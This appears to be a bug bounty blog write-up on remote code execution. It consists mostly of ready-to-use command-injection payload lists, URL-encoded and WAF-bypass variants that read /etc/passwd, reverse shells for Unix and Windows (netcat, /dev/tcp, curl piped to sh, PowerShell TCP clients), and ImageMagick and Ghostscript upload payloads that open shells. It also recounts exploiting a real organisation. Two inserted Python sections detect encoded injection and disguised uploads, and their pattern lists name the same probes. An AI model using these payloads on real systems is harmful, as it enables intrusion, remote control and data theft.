Remote Code Execution ( Unix and Windows )


Hi everyone,

This is Ansar Uddin and I am a Cyber Security Researcher from Bangladesh.

This is my second bug bounty write-up.

Today’s topic is all about RCE exploitation.

RCE: Remote Code Execution (RCE) enables an attacker to execute malicious code as the result of an injection attack. Code injection attacks are different from command injection attacks, and the attacker's capabilities depend on the limits of the server-side interpreter. In some cases an attacker may be able to escalate from code injection to command injection. Remote code evaluation can lead to a full compromise of the vulnerable web application and of the web server. It is important to note that almost every programming language has code evaluation functions.

HUNT for RCE:

Top 46 RCE parameters:

exec={payload}
command={payload}
execute={payload}
ping={payload}
include={payload}
exclude={payload}
jump={payload}
code={payload}
reg={payload}
do={payload}
func={payload}
arg={payload}
option={payload}
load={payload}
process={payload}
step={payload}
read={payload}
function={payload}
req={payload}
feature={payload}
exe={payload}
module={payload}
payload={payload}
run={payload}
print={payload}
email={payload}
id={payload}
username={payload}
user={payload}
to={payload}
from={payload}
search={payload}
query={payload}
q={payload}
s={payload}
shopId={payload}
blogId={payload}
phone={payload}
mode={payload}
next={payload}
firstname={payload}
lastname={payload}
locale={payload}
cmd={payload}
sys={payload}
system={payload}

Payload list:

,id
;id
`id`
|id
&id
&&id
;uname -a;
|id|
||id
||id|
|id;
||id;
;|id|
\id;
\id
\id|
\id\
);id
);id;
;id;
);id|
;id|
)|id
)|id;
' `id` #
| id
& id
; id
& id &
&id&
& uname -a &

RCE when all dangerous characters are escaped (URL-encoded variants):

%7Cid
%26id
%0a uname -a %0a
%27%0Awhoami%0A%27
%27%0Aid%0A%27
%7cid;pwd;uname -a
%7C%7Cid%0A
%2Cid
%3Bid
%3Buname%20-a%3B
%7Cid%7C
%7C%7Cid%7C
%7Cid%3B
%7C%7Cid%3B
%3B%7Cid%7C
%5Cid%3B
%5Cid
%5Cid%7C
%5Cid%5C
%29%3Bid
%29%3Bid%3B
%3Bid%3B
%29%3Bid%7C
%3Bid%7C
%29%7Cid
%29%7Cid%3B
%26%26dir
%26%26id
%7C%20id
%26%20id
%3B%20id
%26%20id%20%26
%60id%60
%26id%26
%26%20uname%20-a%20%26
%26 id %26
%0aid%0a
%0Aid
%0Aid%0A
%0a whoami %0a
%0Acat%20/etc/passwd
%253B%2524%257B%2540print%2528md5%2528%2522whoami0%2522%2529%2529%257D%253B
%7Cuname%20-a%2B%7C%7Ca%2B%23%27%2B%7Cls%2B-la%7Ca%2B%23%7C%22%2B%7Cls%2B-la%7C%7Ca%2B%23
%22%2Csystem%28%27ls%27%29%3B%22
%24%7B%40system%28%22id%22%29%7D
%24%7B%40phpinfo%28%29%7D
%3Bphpinfo%28%29%3B
%3Bphpinfo
%3Bsystem%28%27cat%2520%2Fetc%2Fpasswd%27%29
%3Bsystem%28%27id%27%29
%24%28id%29
%3B%24%7B%40print%28md5%28whoami%29%29%7D
%3B%24%7B%40print%28md5%28%22whoami%22%29%29%7D
%24%3Bid
%24%28%60cat%20%2Fetc%2Fpasswd%60%29

RCE filter and WAF Bypass:

'
whoami
'
|uname -a+||a+#'+|ls+-la|a+#|"+|ls+-la||a+# rce waf bypass
",system('ls');" double quote rce filter bypass
${@system("id")} eval code bypass
${@phpinfo()}
;phpinfo();
;phpinfo
;system('cat%20/etc/passwd')
;system('id')
$(id)
;${@print(md5(whoami))}
;${@print(md5("whoami"))}
$;id
$(`cat /etc/passwd`)
{{ get_user_file("/etc/passwd") }}
<!--#exec cmd="id;-->
system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>
php -r 'var_dump(exec("id"));'
&lt;!--#exec%20cmd=&quot;id;--&gt;
cat$u+/etc$u/passwd$u
/bin$u/bash$u <ip> <port>
";cat+/etc/passwd+#
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+cat+/e'tc/pass'wd
c\\a\\t+/et\\c/pas\\swd
cat /etc$u/passwd
(sy.(st).em)(whoami);
;cat+/etc/passwd
;cat+/etc/passwd+#
;cat$u+/etc$u/passwd$u
id||whoami;
id|whoami;
id&&whoami;
id&whoami;
'i'd
"i"d
\u\n\a\m\e \-\a
cat$u /etc$u/passwd$u
w${u}h${u}o${u}a${u}m${u}i
i$(u)d
i`u`d
{uname,-a}
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
IFS=];b=cat]/etc/passwd;$b
IFS=,;`cat<<<cat,/etc/passwd`
uname${IFS}-a
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
cat `xxd -r -p <<< 2f6574632f706173737764`
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
1;uname${IFS}-a
1;uname${IFS}-a;#
1;uname${IFS}-a;#${IFS}'
1;uname${IFS}-a;#${IFS}';
/*$(id)`id`
/*$(id)`id``*/-id-'/*$(id)`id` #*/-id||'"||id||"/*`*/
/*$(id)`id``*/id'/*$(id)`id` #*/id||'"||id||"/*`*/

Reverse shell :

nc -l 1337
curl https://reverse-shell.sh/yourip:1337 | sh

Reverse Shell Generator:
https://www.revshells.com

I found RCE on a top organization.

Exploitation:

I checked the include= parameter. It is vulnerable to RCE:

whoami && id && uname -a && cat /etc/passwd

There was a WAF that was blocking my request.

I used this payload for exploitation:

'
whoami && id && uname -a && cat /etc/passwd
'

I converted this payload to URL encoding.

Our final payload for WAF bypass:

%27%0a%77%68%6f%61%6d%69%20%26%26%20%69%64%20%26%26%20%75%6e%61%6d%65%20%2d%61%20%26%26%20%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%0a%27

Boom, RCE!

It bypasses the escaping of special characters.
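As an added example (not code from the original write-up): the defender's counterpart to the bypass just described, a check that percent-decodes a parameter value to a fixed point before looking for the shell metacharacters and probe commands that recur in the lists above, so the encoded and decoded forms are judged the same way. Function and variable names are my own.

```python
import re
from urllib.parse import unquote

# Shell metacharacters, command substitution and the ${IFS} trick that recur in the
# payload lists on this page (the newline is what %0a in the final payload becomes)
META = re.compile(r"[;&|`\n\r]|\$\(|\$\{|\bIFS\b")
# Probe commands the listed payloads run to prove execution
PROBES = re.compile(r"\b(id|whoami|uname|cat|dir|ipconfig|phpinfo|system)\b")

def normalize(value, max_rounds=3):
    """Percent-decode until the value stops changing, so %3B, %253B and
    %25253B all end up as ';'. '+' is treated as a space, as in form encoding."""
    cur = value
    for _ in range(max_rounds):
        nxt = unquote(cur.replace("+", " "))
        if nxt == cur:
            break
        cur = nxt
    return cur

def inspect_param(name, raw):
    """Return a finding dict when the *decoded* value carries both a shell
    metacharacter and a probe command, else None. A filter that only looks at
    the raw, still-encoded value sees nothing suspicious in %27%0a...%27."""
    decoded = normalize(raw)
    metas = sorted({m.group(0) for m in META.finditer(decoded)})
    probes = sorted({m.group(0) for m in PROBES.finditer(decoded)})
    if metas and probes:
        return {"param": name, "decoded": decoded, "meta": metas,
                "probes": probes, "was_encoded": decoded != raw}
    return None

if __name__ == "__main__":
    # Constructed sample query values: a shortened form of the write-up's final
    # payload, a double-encoded variant, an ${IFS} variant, and two benign values
    samples = {
        "include": "%27%0a%77%68%6f%61%6d%69%20%26%26%20%69%64%0a%27",
        "q": "%253Bid",
        "cmd": "cat${IFS}/etc/passwd",
        "search": "hello world",
        "title": "R&D report",
    }
    for k, v in samples.items():
        print(k, "->", inspect_param(k, v))
```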

Finding RCE bugs in upload functions:

nc -l -p 1337

Save as test.gif or test.jpg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL3lvdXJpcC95b3VycG9ydCAwPiYx | base64 -d | bash`"||id " )'
pop graphic-context

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/yourip/yourport 0<&1 2>&1'
pop graphic-context
pop graphic-context

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%ncat yourip yourport -e /bin/sh) currentdevice putdeviceprops

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops

Save as poc.xml:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg&quot;|/bin/nc.traditional yourip yourport -e /bin/bash&quot;"
x="0" y="0" height="640px" width="480px"/>
</svg>

nc -nvlp 1337

Save as test.gif or test.jpg

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') (w) file

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl http://inputburpcollaborator) currentdevice putdeviceprops

Save as poc.pdf

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://inputburpcollaborator)
.putdeviceparams
quit

This tool is the best for finding RCE bugs in upload functions:

https://github.com/modzero/mod0BurpUploadScanner.git
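As an added example (not from the write-up or the linked tool): a server-side upload check for the cases described above, rejecting MVG, PostScript and SVG text that arrives under an image extension by comparing the declared extension with the file's magic bytes and refusing delegate/pipe syntax in the body. Names and the constructed samples are my own.

```python
import re

# Magic bytes of the raster formats an image upload endpoint normally means to accept
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".pdf": (b"%PDF-",),
}
# Text-based formats that image libraries parse regardless of the file name,
# matching the MVG, PostScript and SVG files shown above
TEXT_FORMATS = (
    ("MVG", re.compile(rb"^\s*push graphic-context", re.I)),
    ("PostScript", re.compile(rb"^\s*%!PS")),
    ("SVG/XML", re.compile(rb"^\s*(<\?xml|<svg|<!DOCTYPE)", re.I)),
)
# Delegate/pipe syntax that has no business inside a picture
DANGEROUS = re.compile(rb"%pipe%|/dev/tcp/|\|/bin/")

def classify_upload(filename, data):
    """Return (accepted, reason). Accept only when the declared extension's magic
    bytes are present and none of the disguised text formats is detected."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:
        return False, f"extension {ext!r} not allowed"
    head = data[:512]
    for label, pat in TEXT_FORMATS:
        if pat.search(head):
            return False, f"{label} content disguised as {ext}"
    if not any(head.startswith(m) for m in MAGIC[ext]):
        return False, f"magic bytes do not match {ext}"
    if DANGEROUS.search(data):
        return False, "delegate/pipe syntax found in body"
    return True, "ok"

if __name__ == "__main__":
    # Constructed samples: a real GIF header, then the openings of the page's MVG,
    # PostScript and SVG payloads saved under the extensions the write-up suggests
    samples = [
        ("photo.gif", b"GIF89a" + b"\x00" * 16),
        ("test.gif", b"push graphic-context\nviewbox 0 0 640 480\n"),
        ("test.jpg", b"%!PS\nuserdict /setpagedevice undef\n"),
        ("poc.pdf", b"%!PS\ncurrentdevice null true mark\n"),
        ("poc.xml", b'<?xml version="1.0" standalone="no"?>\n'),
    ]
    for name, body in samples:
        print(name, "->", classify_upload(name, body))
```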

This one is best for finding RCE bugs in frameworks/libraries (PHP gadget chains):

https://github.com/ambionics/phpggc

This tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of frohoff’s ysoserial, but for PHP. Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.

Payload list (Windows):

".system('dir')."
' dir
' || dir
' & dir
' && dir
'; dir
" dir
" || dir
" | dir
" & dir
" && dir
"; dir
dir
$(`dir`)
&&dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir
; dir
& dir
&& dir
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();

RCE when all dangerous characters are escaped (URL-encoded variants):

%27%20dir
%27%20%7C%7C%20dir
%27%20%26%20dir
%27%20%26%26%20dir
%27%3B%20dir
%22%20dir
%22%20%7C%7C%20dir
%22%20%7C%20dir
%22%20%26%20dir
%22%20%26%26%20dir
%22%3B%20dir
%22.system%28%27dir%27%29.%22
%24%28%60dir%60%29
%26%26dir
%7C%20dir%20C%3A%5C
%3B%20dir%20C%3A%5C
%26%20dir%20C%3A%5C
%26%26%20dir%20C%3A%5C
dir%20C%3A%5C
%7C%20dir
%3B%20dir
%26%20dir
%26%26%20dir
+dir+c:\+|
+|+dir+c:\+|
+|+dir+c:%2f+|
dir+c:\
||+dir|c:\
+|+Dir+c:\
+|+Dir+c:%255c
+|+Dir+c:%2f
$+|+Dir+c:\
$+|+Dir+c:%255c
$+|+Dir+c:%2f
%26%26+|+dir c:\
%0a+dir+c:\
%26%26+|+dir c:%2f
$%26%26dir+c:%2f
%0a+dir+c:%2f
%0a+dir+c:%255c
$%26%26dir c:\
%26%26+|+dir c:%255c
$%26%26dir+c:%255c
%20{${phpinfo()}}

Reverse shell:

nc -nvlp 443

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('your ip',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

or

powershell -NoP -NonI -W Hidden -Exec Bypass "& {$ps=$false;$hostip='your ip';$port=443;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"

Reverse Shell Generator:
https://www.revshells.com

Download files:

powershell -c "(new-object System.Net.WebClient).DownloadFile('https://eternallybored.org/misc/wget/1.21.1/64/wget.exe','C:\Users\admin\Desktop\wget.exe')"

powershell iwr -uri http://10.10.16.97:8000/chisel.exe -outfile ch.exe # also works in PS ConstrainedLanguageMode

Best Burp Suite extension for RCE (Unix and Windows):

https://github.com/ewilded/shelling

Best command injection exploiter:

https://github.com/commixproject/commix

Happy Hacking!